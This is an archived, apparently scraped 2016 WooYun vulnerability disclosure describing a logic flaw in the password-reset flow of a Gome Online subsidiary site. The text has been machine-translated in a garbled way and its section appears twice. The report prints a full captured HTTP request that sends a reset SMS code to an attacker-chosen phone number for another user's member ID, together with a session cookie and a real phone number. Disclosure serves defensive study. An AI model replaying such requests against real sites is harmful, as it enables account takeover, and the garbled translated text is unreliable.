国美在线旗下某站点逻辑设计缺陷导致任意用户密码重置

漏洞标题 国美在线旗下某站点逻辑设计缺陷导致任意用户密码重置 相关厂商 国美控股集团 漏洞作者 奶嘴 提交时间 2016-05-05 19:54 公开时间 2016-06-20 09:50 漏洞类型 …

漏洞标题 Gome Online网站的逻辑设计缺陷导致任何用户密码重置 相关制造商 国美控股集团 漏洞作者 乳头 提交时间 2016-05-05 19: 54 公共时间 2016-06-20 09: 50 漏洞类型 设计缺陷/逻辑错误 危险等级 高 自我评估等级 15 漏洞状态 制造商已确认 标签标签 设计错误,设计缺陷/边界旁路,设计缺陷,逻辑错误 漏洞详细信息 打开http://www.multigold.com.cn/forgetPassword.html 抓包 POST /myec/member_sendMobileCode.html HTTP/1.1 主机: www.multigold.com.cn 内容长度: 34 接受: */* 来源:http://www.multigold.com.cn X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/48.0.2564.116 Safari/537.36 内容类型: application/x-www-form-urlencoded Referer:http://www.multigold.com.cn/forgetPassword.html Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh; q=0.8 Cookie:是M=y; JSESSIONID=2C26CBCF9A46278CAA538326D8 * 87A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www .multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26 | pv: 2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309 连接:关闭 memberId=118953& mobile=13730766696 电话号码而不是自己的号码 短信收到OK 密码是 123456

漏洞证明: 打开http://www.multigold.com.cn/forgetPassword.html 抓包 POST /myec/member_sendMobileCode.html HTTP/1.1 主机: www.multigold.com.cn 内容长度: 34 接受: */* 来源:http://www.multigold.com.cn X-Requested-With: XMLHttpRequest 用户代理: Mozilla/5.0(Windows NT 6.1; WOW64)AppleWebKit/537.36(KHTML,与Gecko一样)Chrome/48.0.2564.116 Safari/537.36 内容类型: application/x-www-form-urlencoded Referer:http://www.multigold.com.cn/forgetPassword.html Accept-Encoding: gzip,deflate Accept-Language: zh-CN,zh; q=0.8 Cookie:是M=y; JSESSIONID=2C26CBCF9A46278CAA538326D8 * 87A8; BIGipServerNginx_pool=16879882.20480.0000; QIAO_CK_5046321_R=; baidu_qiao_v3_count_5046321=1; isM=y; 53kf_70771113_keyword=http://www.multigold.com.cn/show-forgetPassword.html; _gsref_1927850995=http://www .multigold.com.cn/show-forgetPassword.html; _gscu_1927850995=62448307gbzopb26; _gscs_1927850995=62448307yr2n8r26 | pv: 2; _gscbrs_1927850995=1; Hm_lvt_c06c14f2ede01409c9caa02fd63369e9=1462448308; Hm_lpvt_c06c14f2ede01409c9caa02fd63369e9=1462448699; CNZZDATA1000338348=223599442-1462448309-%7C1462448309 连接:关闭 memberId=118953& mobile=13730766696 电话号码而不是自己的号码 短信收到OK 密码是 123456

修理计划: 没有 版权声明:请注明出处。奶嘴@乌云

你可能感兴趣的文章

相关问题